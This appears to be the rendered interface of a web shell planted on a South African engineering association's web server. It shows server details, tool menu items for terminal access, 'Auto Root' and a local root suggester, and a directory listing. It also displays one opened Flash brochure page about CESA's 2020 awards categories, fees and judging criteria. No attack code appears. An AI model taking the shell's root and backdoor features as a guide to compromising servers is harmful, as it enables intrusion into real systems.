Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
cesa.co.za /
callforentries2020 /
WebSearch /
Delete
Unzip
Name
Size
Permission
Date
Action
page0001.html
5.63
KB
-rw-r--r--
2020-02-10 07:42
page0002.html
7.71
KB
-rw-r--r--
2020-02-10 07:42
page0003.html
7.71
KB
-rw-r--r--
2020-02-10 07:42
page0004.html
8.42
KB
-rw-r--r--
2020-02-10 07:42
page0005.html
8.42
KB
-rw-r--r--
2020-02-10 07:42
page0006.html
10.38
KB
-rw-r--r--
2020-02-10 07:42
page0007.html
10.38
KB
-rw-r--r--
2020-02-10 07:42
page0008.html
8.73
KB
-rw-r--r--
2020-02-10 07:42
page0009.html
8.73
KB
-rw-r--r--
2020-02-10 07:42
page0010.html
9.46
KB
-rw-r--r--
2020-02-10 07:42
page0011.html
9.46
KB
-rw-r--r--
2020-02-10 07:42
page0012.html
10.47
KB
-rw-r--r--
2020-02-10 07:42
page0013.html
10.47
KB
-rw-r--r--
2020-02-10 07:42
page0014.html
10.63
KB
-rw-r--r--
2020-02-10 07:42
page0015.html
10.63
KB
-rw-r--r--
2020-02-10 07:42
page0016.html
6.52
KB
-rw-r--r--
2020-02-10 07:42
page0017.html
6.52
KB
-rw-r--r--
2020-02-10 07:42
page0018.html
11.02
KB
-rw-r--r--
2020-02-10 07:42
page0019.html
11.02
KB
-rw-r--r--
2020-02-10 07:42
page0020.html
7.76
KB
-rw-r--r--
2020-02-10 07:42
page0021.html
7.76
KB
-rw-r--r--
2020-02-10 07:42
page0022.html
8.04
KB
-rw-r--r--
2020-02-10 07:42
page0023.html
8.04
KB
-rw-r--r--
2020-02-10 07:42
page0024.html
5.87
KB
-rw-r--r--
2020-02-10 07:42
summary.html
1.8
KB
-rw-r--r--
2020-02-10 07:42
Save
Rename
<!-- saved from url=(0014)about:internet --> <html lang="en"> <!-- Smart developers always View Source. This application was built using Adobe Flex, an open source framework for building rich Internet applications that get delivered via the Flash Player or to desktops via Adobe AIR. Learn more about Flex at http://flex.org // --> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <!-- BEGIN Browser History required section --> <link rel="stylesheet" type="text/css" href="../history/history.css" /> <!-- END Browser History required section --> <title>CESA_AON_brochure_2020</title> <script src="../AC_OETags.js" language="javascript"></script> <!-- BEGIN Browser History required section --> <script src="../history/history.js" language="javascript"></script> <!-- END Browser History required section --> <style> body { margin: 0px; overflow:hidden } </style> <script type="text/javascript"> var errorName = null; function isBrowserSupportPlugin() { var supported = null; try { new ActiveXObject(""); } catch (e) { errorName = e.name; } try { supported = !!new ActiveXObject("htmlfile"); } catch (e) { supported = false; } if(errorName != 'ReferenceError' && supported==false){ supported = false; }else{ supported =true; } return supported; } function isMetroIE() { var matchIE = /MSIE\s([\d.]+)/; if ((matchIE.test(navigator.userAgent)) && !isBrowserSupportPlugin()) return true; else return false; } var iRegex = /android|BlackBerry|Windows Phone|(iP(hone|ad))/i; if (iRegex.test(navigator.userAgent) || isMetroIE()){ var url= "../html5.html?page=3"; if( false && window.parent) window.parent.location=url; else window.location =url; } </script> <script language="JavaScript" type="text/javascript"> <!-- // ----------------------------------------------------------------------------- // Globals // Major version of Flash required var requiredMajorVersion = 10; // Minor version of Flash required var requiredMinorVersion = 0; // Minor version of Flash required var requiredRevision = 0; // ----------------------------------------------------------------------------- // --> </script> </head> <body scroll="no" onload="setBrowserFocus()"> <script language="JavaScript" type="text/javascript"> <!-- // Version check for the Flash Player that has the ability to start Player Product Install (6.0r65) var hasProductInstall = DetectFlashVer(6, 0, 65); // Version check based upon the values defined in globals var hasRequestedVersion = DetectFlashVer(requiredMajorVersion, requiredMinorVersion, requiredRevision); function closeMe(){return window.close();} function getparafromurl() { var url,pos,parastr,para; url = window.location.href; pos = url.indexOf("?") parastr = url.substring(pos+1); return parastr; } function setBrowserFocus(){ document.getElementById('main').focus();} if ( hasProductInstall && !hasRequestedVersion ) { // DO NOT MODIFY THE FOLLOWING FOUR LINES // Location visited after installation is complete if installation is required var MMPlayerType = (isIE == true) ? "ActiveX" : "PlugIn"; var MMredirectURL = window.location; document.title = document.title.slice(0, 47) + " - Flash Player Installation"; var MMdoctitle = document.title; AC_FL_RunContent( "src", "playerProductInstall", "FlashVars", "MMredirectURL="+MMredirectURL+'&MMplayerType='+MMPlayerType+'&MMdoctitle='+MMdoctitle+"", "width", "100%", "height", "100%", "align", "middle", "id", "main", "quality", "high", "allowFullScreen","true", "FlashVars", getparafromurl(), "bgcolor", "#ffffff", "name", "main", "allowScriptAccess","sameDomain", "type", "application/x-shockwave-flash", "pluginspage", "http://www.adobe.com/go/getflashplayer" ); } else if (hasRequestedVersion) { // if we've detected an acceptable version // embed the Flash Content SWF when all tests are passed AC_FL_RunContent( "src", "../main?page=4", "width", "100%", "height", "100%", "align", "middle", "allowFullScreen","true", "id", "main", "FlashVars", getparafromurl(), "quality", "high", "bgcolor", "#ffffff", "name", "main", "allowScriptAccess","sameDomain", "type", "application/x-shockwave-flash", "pluginspage", "http://www.adobe.com/go/getflashplayer" ); } else { // flash is too old or we can't detect the plugin var alternateContent = 'Alternate HTML content should be placed here. ' + 'This content requires the Adobe Flash Player. ' + '<a href=http://www.adobe.com/go/getflash/>Get Flash</a>'; document.write(alternateContent); // insert non-flash content } // --> </script> <noscript> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="main" width="100%" height="100%" codebase="http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab"> <param name="movie" value="../main.swf?page=4" /> <param name="quality" value="high" /> <param name="allowFullScreen" value="true" /> <param name="bgcolor" value="#ffffff" /> <param name="allowScriptAccess" value="sameDomain" /> <embed src="main.swf" quality="high" bgcolor="#ffffff" width="100%" height="100%" name="main" align="middle" play="true" loop="false" allowFullScreen="true" quality="high" allowScriptAccess="sameDomain" type="application/x-shockwave-flash" pluginspage="http://www.adobe.com/go/getflashplayer"> </embed> </object> </noscript> <noscript> POINTS TO POINTS TO 1. CATEGORY: PROJECTS AWARDS 1. Projects with a value less than R50 Million 2. Projects ranging in the value from R50 Million to less than R250 Million 3. Projects with a value equal R250 Million to less than R1 Billion 4. Mega Projects - Projects with a value equal or greater than R1 Billion 5. Best International Project 6. Engineering Technology and Innovation - HVAC Building Design Excellence Award 7. Engineering Technology and Innovation – Automation and Control in Plant Systems Excellence Award Engineering has played a critical role in increasing the health and quality of life in the last 70 years. From developing better water supplies, municipal sewer systems, wastewater treatment plants to the design of buildings to protect us from natural hazards and providing health care. To improved agriculture through water resource development and distribution projects to rapid and dramatic changes in transportation systems – engineers have developed the basic infrastructure on which modern society depends. CONSIDER AWARDS BANQUET Awards will be presented at a formal banquet in Johannesburg on Wednesday the 19th August 2020 PREVIOUS AWARDS WINNERS http://cesa.co.za/awards/ CLOSING DATE FOR ENTRIES Pre-entries close on Thursday, 26th March 2020. Successful Pre-entries will be noti ed by 6th April 2020. Companies that successfully meet the pre-entry criteria will then be invited to submit a full entry. Full Entries close on Friday, 22nd May 2020. CONSIDER COST OF ENTRIES EXCLUDING VAT. • A non- refundable deposit/ entry fee of R4 617.00 • A non-refundable submission fee of R15 390.00 per successful award entry. This entry fee includes one table that seats ten people, at the Awards Banquet. GUIDELINE Projects Entries will be judged on a combination of the following criteria: CRITERIA FOR PROJECT CATEGORIES 1-5 POINTS 1) Quality of engineering design 10 2) Ingenuity, originality and innovation (solution during planning & design and/or 15 solution during construction) 3) Management of planning and technical design 10 4) Aesthetics of engineering elements 5 5) Budgetary compliance 10 6) In uence of consulting engineer on Implementability and constructability 5 7) Complexity and sophistication 10 8) Responsibility carried by consulting engineer (risk) 10 9) Sustainability considerations 10 10) Responsiveness to needs of client 15 11) Social impact of the project 10 12) Meeting the client’s deadline for completion 5 13) Intercountry Logistics – Challenges and Solutions 15 (only relevant for International Projects) 130 1 2 13 All JV partners (CESA Members Only) must be listed on the pre-entry form and a signed letter of consent from each JV partner must accompany the pre-entry form. Failure to submit this with your pre-entry form will result in your pre-entry being disquali ed. Only JV partners that are members of CESA will be recognised during the Awards Banquet. 1 Total </noscript> </body> </html>